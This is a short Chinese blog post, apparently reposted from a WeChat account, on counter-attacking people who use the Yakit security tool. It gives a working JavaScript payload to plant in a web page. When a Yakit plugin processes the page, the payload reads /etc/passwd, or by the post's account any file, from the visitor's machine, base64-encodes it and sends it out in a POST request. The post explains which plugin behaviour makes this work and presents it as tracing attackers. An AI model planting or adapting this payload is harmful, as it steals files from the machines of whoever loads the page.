杜绝废话,随便在页面上嵌入一个js,内容是:
<script>
const xhr = new XMLHttpRequest();
xhr.open("POST", "http://yakit.com/filesubmit");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send(`file={{base64enc(file(/etc/passwd))}}`);
</script>
可自由发挥,读任意文件。
原因:yakit默认不会对经过MITM PROXY的流量中的fuzztag进行解析,但是经过插件时会被解析,所以这也是利用限制。
顺便吐槽:yakit跑起来卡卡的,啥时候能优化到和burp一样啊。
原文始发于微信公众号(Medi0cr1ty):利用yakit功能特性溯源攻击者